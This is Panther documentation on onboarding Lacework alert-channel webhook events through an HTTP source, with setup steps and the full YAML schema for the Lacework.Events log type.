# Lacework Alert Channel Webhook ## Overview You can ingest Lacework Event logs into Panther by configuring a [Custom Webhook Alert Channel](https://docs.lacework.net/onboarding/webhook) to post events to a Panther [HTTP source](https://docs.panther.com/data-onboarding/data-transports/http). If you are looking for instructions on ingesting Lacework log types other than `Lacework.Events`, please see the [Lacework Export documentation](https://docs.panther.com/data-onboarding/supported-logs/lacework/export). ## How to onboard Alert Channel Webhook logs to Panther ### Step 1: Create a Lacework Alert Channel Webhook log source in Panther 1. In the left-hand navigation bar of your Panther Console, click **Configure** > **Log Sources.** 2. Click **Create New**. 3. Search for "Lacework Alert Channel Webhook", then click its tile. * In the slide-out panel, the **Transport Mechanism** dropdown in the upper-right corner will be pre-populated with the **HTTP** option. 4. Click **Start Setup**.
In the Panther Console, the slideout panel for Lacework Alert Channel Webhook is open. Start Setup is in the upper right corner.
5. Follow [Panther's instructions for configuring an HTTP Source](https://docs.panther.com/data-onboarding/data-transports/http). * During setup, on the security configuration page, choose [bearer authentication](https://docs.panther.com/data-transports/http#bearer). You can generate a token value by clicking the circular arrows, or supply your own.\ ![](https://4011785613-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-LgdiSWdyJcXPahGi9Rs-2910905616%2Fuploads%2Fgit-blob-361da8478686d08ae35df333d4e0250cfb450b51%2Fbearer-auth.jpg?alt=media) * Payloads sent to this source are subject to the [payload requirements for all HTTP sources](https://docs.panther.com/data-transports/http#payload-requirements). * Do not proceed to the next step until the creation of your HTTP endpoint has completed. ### Step 2: Configure Lacework to push logs to your Panther HTTP source * Follow [Lacework's documentation](https://docs.lacework.net/onboarding/webhook) to configure a Custom Webhook Alert Channel. ## Supported log type ### Lacework.Events Lacework.Events represents the content of an exported Lacework Alert S3 Object. Reference: [Lacework Documentation on Events](https://www.lacework.com/platform/). {% hint style="info" %} Lacework Alert S3 Objects often contain only a subset of the fields shown below in Panther's `Lacework.Events` schema. Many fields in this schema are included to accommodate edge cases. See example payloads in [the Lacework documentation](https://docs.lacework.net/onboarding/webhook). {% endhint %} ```yaml - name: EVENT_CATEGORY required: true description: The category the event falls into type: string - name: EVENT_DETAILS required: true description: The event details type: object fields: - name: data description: The array of event data type: array element: type: object fields: - name: START_TIME description: The event start time. type: timestamp timeFormat: rfc3339 - name: END_TIME description: The event end time. type: timestamp timeFormat: rfc3339 - name: EVENT_TYPE description: The event type description eg - launched new binary. type: string - name: EVENT_ID description: The event alert ID. type: string - name: EVENT_ACTOR description: The origin of the event eg - AWS, User. type: string - name: EVENT_MODEL description: The model that triggered an alert. type: string - name: ENTITY_MAP description: The map of related fields to the detection alert. type: object fields: - name: User description: Any user based info involved in an alert. type: array element: type: object fields: - name: MACHINE_HOSTNAME description: Hostname field type: string - name: USERNAME description: Username field type: string indicators: - username - name: Application description: Any application based info involved in an alert. type: array element: type: object fields: - name: APPLICATION description: Application field type: string - name: HAS_EXTERNAL_CONNS description: HasExternalConns field type: bigint - name: IS_CLIENT description: IsClient field type: bigint - name: IS_SERVER description: IsServer field type: bigint - name: EARLIEST_KNOWN_TIME description: EarliestKnownTime field type: timestamp timeFormat: rfc3339 - name: Machine description: Any machine based info involved in an alert. type: array element: type: object fields: - name: HOSTNAME description: Hostname field type: string - name: EXTERNAL_IP description: ExternalIP field type: string indicators: - ip - name: INSTANCE_ID description: InstanceID field type: string - name: INSTANCE_NAME description: InstanceName field type: string - name: CPU_PERCENTAGE description: CPUPercentage field type: float - name: INTERNAL_IP_ADDR description: InternalIPAddress field type: string indicators: - ip - name: IS_EXTERNAL description: IsExternal field type: bigint - name: Container description: Any container based info involved in an alert. type: array element: type: object fields: - name: IMAGE_REPO description: ImageRepo field type: string - name: IMAGE_TAG description: ImageTag field type: string - name: HAS_EXTERNAL_CONNS description: HasExternalConns field type: bigint - name: IS_CLIENT description: IsClient field type: bigint - name: IS_SERVER description: IsServer field type: bigint - name: FIRST_SEEN_TIME description: FirstSeenTime field type: timestamp timeFormat: rfc3339 - name: POD_NAMESPACE description: PodNamespace field type: string - name: POD_IP_ADDR description: PodIPAddress field type: string indicators: - ip - name: DnsName description: Any dns based info involved in an alert. type: array element: type: object fields: - name: HOSTNAME description: Hostname field type: string - name: PORT_LIST description: PortList field type: array element: type: int - name: TOTAL_IN_BYTES description: TotalINBytes field type: float - name: TOTAL_OUT_BYTES description: TotalOUTBytes field type: float - name: IpAddress description: Any ip based info involved in an alert. type: array element: type: object fields: - name: IP_ADDRESS description: SourceIPAddress field type: string indicators: - ip - name: TOTAL_IN_BYTES description: TotalINBytes field type: float - name: TOTAL_OUT_BYTES description: TotalOUTBytes field type: float - name: THREAT_TAGS description: ThreatTags field type: array element: type: string - name: THREAT_SOURCE description: ThreatSource field type: json - name: COUNTRY description: Country field type: string - name: REGION description: Region field type: string - name: PORT_LIST description: PortList field type: array element: type: int - name: FIRST_SEEN_TIME description: FirstSeenTime field type: string - name: Process description: Any process based info involved in an alert. type: array element: type: object fields: - name: HOSTNAME description: Hostname field type: string - name: PROCESS_ID description: ProcessID field type: bigint - name: PROCESS_START_TIME description: ProcessStartTime field type: timestamp timeFormat: rfc3339 - name: CMDLINE description: CommandLine field type: string - name: CPU_PERCENTAGE description: CPUPercentage field type: float - name: FileDataHash description: Any filehash based info involved in an alert. type: array element: type: object fields: - name: FILEDATA_HASH description: FiledataHash field type: string - name: MACHINE_COUNT description: MachineCount field type: bigint - name: EXE_PATH_LIST description: EXEPathList field type: array element: type: string - name: FIRST_SEEN_TIME description: FirstSeenTime field type: timestamp timeFormat: rfc3339 - name: IS_KNOWN_BAD description: ISKnownBad field type: bigint - name: FileExePath description: Any executable filepath information. type: array element: type: object fields: - name: EXE_PATH description: EXEPath field type: string - name: FIRST_SEEN_TIME description: FirstSeenTime field type: timestamp timeFormat: rfc3339 - name: LAST_FILEDATA_HASH description: LastFileDataHash field type: string - name: LAST_PACKAGE_NAME description: LastPackageName field type: string - name: LAST_VERSION description: LastVersion field type: string - name: LAST_FILE_OWNER description: LastFileOwner field type: string - name: SourceIpAddress description: Source IP based information. type: array element: type: object fields: - name: IP_ADDRESS description: SourceIPAddress field type: string indicators: - ip - name: REGION description: Region field type: string - name: COUNTRY description: Country field type: string - name: API description: The service and endpoint. type: array element: type: object fields: - name: SERVICE description: EventSource field type: string - name: API description: EventName field type: string - name: Region description: Regional based information. type: array element: type: object fields: - name: REGION description: Region field type: string - name: ACCOUNT_LIST description: RecipientAccountID field type: array element: type: string - name: CT_User description: Cloudtrail user information. type: array element: type: object fields: - name: USERNAME description: Username field type: string indicators: - username - name: ACCOUNT_ID description: AccountID field type: string - name: MFA description: MFA field type: bigint - name: API_LIST description: APIList field type: array element: type: string - name: REGION_LIST description: RegionList field type: array element: type: string - name: PRINCIPAL_ID description: AccessKeyID field type: string - name: Resource description: Resource values. type: array element: type: object fields: - name: NAME description: Name field type: string - name: VALUE description: Value field type: string - name: RecId description: Receiver account info. type: array element: type: object fields: - name: REC_ID description: RECID field type: string - name: ACCOUNT_ID description: RecipientAccountID field type: string - name: ACCOUNT_ALIAS description: AccountAlias field type: string - name: TITLE description: Title field type: string - name: STATUS description: Status field type: string - name: EVAL_TYPE description: EVALType field type: string - name: EVAL_GUID description: EVALGUID field type: string - name: CustomRule description: Custom Rule info. type: array element: type: object fields: - name: LAST_UPDATED_TIME description: LastUpdatedTime field type: timestamp timeFormat: rfc3339 - name: LAST_UPDATED_USER description: LastUpdatedUser field type: string - name: DISPLAY_FILTER description: DisplayFilter field type: string - name: RULE_GUID description: RuleGUID field type: string - name: NewViolation description: Violation Ref. type: array element: type: object fields: - name: REC_ID description: RECID field type: string - name: REASON description: Reason field type: string - name: RESOURCE description: Resource field type: string - name: ViolationReason description: A reason for the violation. type: array element: type: object fields: - name: REC_ID description: RECID field type: string - name: REASON description: Reason field type: string - name: SEVERITY required: true description: The severity level of the alert type: bigint - name: START_TIME required: true description: The event start time. type: timestamp timeFormat: strftime=%d %b %Y %H:%M %Z isEventTime: true - name: SUMMARY required: true description: The alert title and quick summary type: string - name: EVENT_TYPE required: true description: The type of event type: string - name: EVENT_NAME required: true description: The event name type: string - name: LINK required: true description: A link to the Lacework dashboard for the event type: string - name: EVENT_ID required: true description: The eventID reference type: bigint - name: ACCOUNT required: true description: The Lacework tenant that created the event type: string - name: SOURCE required: true description: The data source the event triggered on type: string ```